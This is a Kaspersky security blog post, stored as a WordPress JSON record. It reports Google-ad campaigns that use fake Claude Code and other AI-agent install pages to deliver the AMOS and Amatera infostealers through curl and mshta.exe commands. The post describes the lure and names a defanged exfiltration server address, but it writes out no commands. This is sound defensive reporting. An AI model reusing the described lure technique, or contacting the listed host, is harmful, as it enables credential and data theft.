{"id":55412,"date":"2026-03-12T11:56:27","date_gmt":"2026-03-12T15:56:27","guid":{"rendered":"https:\/\/www.kaspersky.com\/blog\/?p=55412"},"modified":"2026-03-12T11:56:27","modified_gmt":"2026-03-12T15:56:27","slug":"fake-ai-agents-infostealers","status":"publish","type":"post","link":"https:\/\/www.kaspersky.com\/blog\/fake-ai-agents-infostealers\/55412\/","title":{"rendered":"Malware disguised as AI agents"},"content":{"rendered":"<p>We recently <a href=\"https:\/\/www.kaspersky.com\/blog\/share-chatgpt-chat-clickfix-macos-amos-infostealer\/54928\/\" target=\"_blank\" rel=\"noopener nofollow\">discussed<\/a> how malicious actors are spreading the AMOS infostealer for macOS via Google Ads, leveraging a chat with an AI assistant on the actual OpenAI website to host malicious instructions. We decided to dig a little deeper, only to discover several similar malicious campaigns where attackers attempt to slip users malware disguised as popular AI tools through Google Search ads. If the victims are searching for macOS-specific tools, the payload deployed is the very same AMOS; if they\u2019re on Windows, it\u2019s the Amatera infostealer instead. These campaigns use the popular Chinese AI Doubao, the viral AI assistant OpenClaw, or the coding assistant Claude Code as bait. This means such campaigns pose a threat not only to home users but also to organizations.<\/p>\n<p>The reality is that corporate employees are increasingly using coding assistants like Claude Code, and workflow automation agents like OpenClaw. This brings <a href=\"https:\/\/www.kaspersky.com\/blog\/top-agentic-ai-risks-2026\/55184\/\" target=\"_blank\" rel=\"noopener nofollow\">its own set of risks<\/a>, which is why many organizations have yet to officially approve (or pay for) access to such tools. Consequently, some employees take matters into their own hands to find these trendy tools, and head straight to Google. They type in a search query and are served a sponsored link leading to a malicious installation guide. Let\u2019s take a closer look at how this attack plays out, using a Claude Code distribution campaign discovered in early March as an example.<\/p>\n<h2>The search query<\/h2>\n<p>So, a user starts looking for a place to download the Anthropic agent and types something like \u201c<em>Claude Code download<\/em>\u201d into the search bar. The search engine returns a list of links, with \u201csponsored links\u201d (paid advertisements) sitting at the top. One of these ads leads the user to a malicious page featuring fake documentation. Interestingly, the site itself is built on Squarespace, a legitimate website builder that helps it bypass anti-phishing filters.<\/p>\n<p><\/p><div id=\"attachment_55418\" style=\"width: 854px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114532\/fake-ai-agents-infostealers-search-results.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-55418\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114532\/fake-ai-agents-infostealers-search-results.jpg\" width=\"844\" height=\"759\" alt=\"Search result examples\" class=\"wp-image-55418 size-full\"><\/a><p id=\"caption-attachment-55418\" class=\"wp-caption-text\">Search results with ads in Romania and Brazil<\/p><\/div><br>\nThe attackers\u2019 site meticulously mimics the original Claude Code documentation, complete with installation instructions. Just like the real deal, it prompts the user to copy and run a command. However, once executed, it installs not an AI agent but malware. Essentially, this is just another <a href=\"https:\/\/www.kaspersky.com\/blog\/clickfix-attack-variations\/55340\/\" target=\"_blank\" rel=\"noopener nofollow\">flavor of the ClickFix attack<\/a> \u2014 one that has earned its own nickname: <a href=\"https:\/\/pushsecurity.com\/blog\/installfix\/\" target=\"_blank\" rel=\"noopener nofollow\">InstallFix<\/a>.\n<div id=\"attachment_55419\" style=\"width: 1342px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114632\/fake-ai-agents-infostealers-search-fake-site.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-55419\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114632\/fake-ai-agents-infostealers-search-fake-site.jpg\" width=\"1332\" height=\"661\" alt=\"Malicious website\" class=\"wp-image-55419 size-full\"><\/a><p id=\"caption-attachment-55419\" class=\"wp-caption-text\">Malicious site mimicking installation instructions<\/p><\/div>\n<div id=\"attachment_55420\" style=\"width: 1339px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114748\/fake-ai-agents-infostealers-search-legitimate-site.jpg\"><img decoding=\"async\" aria-describedby=\"caption-attachment-55420\" src=\"https:\/\/media.kasperskydaily.com\/wp-content\/uploads\/sites\/92\/2026\/03\/12114748\/fake-ai-agents-infostealers-search-legitimate-site.jpg\" width=\"1329\" height=\"703\" alt=\"Claude Code website\" class=\"wp-image-55420 size-full\"><\/a><p id=\"caption-attachment-55420\" class=\"wp-caption-text\">Genuine Claude Code site with installation instructions<\/p><\/div>\n<h2>Malicious payload<\/h2>\n<p>Just like with the original Claude Code, the command for macOS attempts to install an application using the curl command-line utility. In reality, it deploys the AMOS spyware \u2014 previously <a href=\"https:\/\/securelist.com\/kral-amos-vidar-acr-stealers\/114237\/\" target=\"_blank\" rel=\"noopener\">described by our experts<\/a> on Securelist \u2014 which was used in a <a href=\"https:\/\/www.kaspersky.com\/blog\/share-chatgpt-chat-clickfix-macos-amos-infostealer\/54928\/\" target=\"_blank\" rel=\"noopener nofollow\">similar past campaign<\/a>.<\/p>\n<p>In the case of Windows, the malware is installed using the system utility <em>mshta.exe<\/em>, which executes HTML-based applications instead of curl, which is used for the genuine Claude Code. This utility deploys the Amatera infostealer, which harvests browser data, crypto-wallet info, as well as information from the user folder, and sends it to a remote server at 144{.}124.235.102.<\/p>\n<h2>How to keep your company safe<\/h2>\n<p>Interest in AI agents continues to grow, and the emergence of new tools and their rising popularity are creating fresh attack vectors. Specifically, attempting to seek out third-party AI tools can not only jeopardize the source code of projects on the victim\u2019s computer but also lead to the compromise of secrets, confidential corporate files, and user accounts.<\/p>\n<p>To prevent this from happening, the first step should be educating employees about these dangers and the tricks used by threat actors. This can be done using our <a href=\"https:\/\/k-asap.com\/en\/?icid=gl_kdailyplacehold_acq_ona_smm__onl_b2b_kasperskydaily_wpplaceholder____kasap___\" target=\"_blank\" rel=\"noopener\">training platform: Kaspersky Automated Security Awareness<\/a>. Incidentally, it includes a specialized lesson on the use of AI in corporate environments.<\/p>\n<p>Additionally, we recommend protecting all corporate devices with <a href=\"https:\/\/www.kaspersky.com\/next?icid=gl_kdailyplacehold_acq_ona_smm__onl_b2b_kdaily_wpplaceholder_sm-team___knext____a8c0f733e524af27\" target=\"_blank\" rel=\"noopener nofollow\">proven cybersecurity solutions<\/a>.<\/p>\n<p>We also suggest checking out our previously published article on <a href=\"https:\/\/www.kaspersky.com\/blog\/shadow-ai-3-policies\/54252\/\" target=\"_blank\" rel=\"noopener nofollow\">three approaches to minimizing the risks of using shadow AI<\/a>.<\/p>\n<input type=\"hidden\" class=\"category_for_banner\" value=\"kaspersky-next\">\n","protected":false},"excerpt":{"rendered":"<p>Threat actors are promoting pages containing malicious instructions for installing AI agents intended for workflow automation. <\/p>\n","protected":false},"author":2787,"featured_media":55421,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1999,3051,3052],"tags":[1140,4657,1946,36],"class_list":{"0":"post-55412","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-business","8":"category-enterprise","9":"category-smb","10":"tag-ai","11":"tag-infostealers","12":"tag-macos","13":"tag-malware-2"},"hreflang":[{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/fake-ai-agents-infostealers\/55412\/"},{"hreflang":"en-in","url":"https:\/\/www.kaspersky.co.in\/blog\/fake-ai-agents-infostealers\/30270\/"},{"hreflang":"en-ae","url":"https:\/\/me-en.kaspersky.com\/blog\/fake-ai-agents-infostealers\/25346\/"},{"hreflang":"ar","url":"https:\/\/me.kaspersky.com\/blog\/fake-ai-agents-infostealers\/13273\/"},{"hreflang":"en-gb","url":"https:\/\/www.kaspersky.co.uk\/blog\/fake-ai-agents-infostealers\/30141\/"},{"hreflang":"es-mx","url":"https:\/\/latam.kaspersky.com\/blog\/fake-ai-agents-infostealers\/29065\/"},{"hreflang":"es","url":"https:\/\/www.kaspersky.es\/blog\/fake-ai-agents-infostealers\/31946\/"},{"hreflang":"it","url":"https:\/\/www.kaspersky.it\/blog\/fake-ai-agents-infostealers\/30549\/"},{"hreflang":"ru","url":"https:\/\/www.kaspersky.ru\/blog\/fake-ai-agents-infostealers\/41448\/"},{"hreflang":"tr","url":"https:\/\/www.kaspersky.com.tr\/blog\/fake-ai-agents-infostealers\/14390\/"},{"hreflang":"fr","url":"https:\/\/www.kaspersky.fr\/blog\/fake-ai-agents-infostealers\/23740\/"},{"hreflang":"pt-br","url":"https:\/\/www.kaspersky.com.br\/blog\/fake-ai-agents-infostealers\/24828\/"},{"hreflang":"de","url":"https:\/\/www.kaspersky.de\/blog\/fake-ai-agents-infostealers\/33311\/"},{"hreflang":"ru-kz","url":"https:\/\/blog.kaspersky.kz\/fake-ai-agents-infostealers\/30395\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/fake-ai-agents-infostealers\/36025\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/fake-ai-agents-infostealers\/35684\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.com\/blog\/tag\/infostealers\/","name":"infostealers"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/55412","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/2787"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=55412"}],"version-history":[{"count":3,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/55412\/revisions"}],"predecessor-version":[{"id":55422,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/55412\/revisions\/55422"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/55421"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=55412"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=55412"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=55412"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}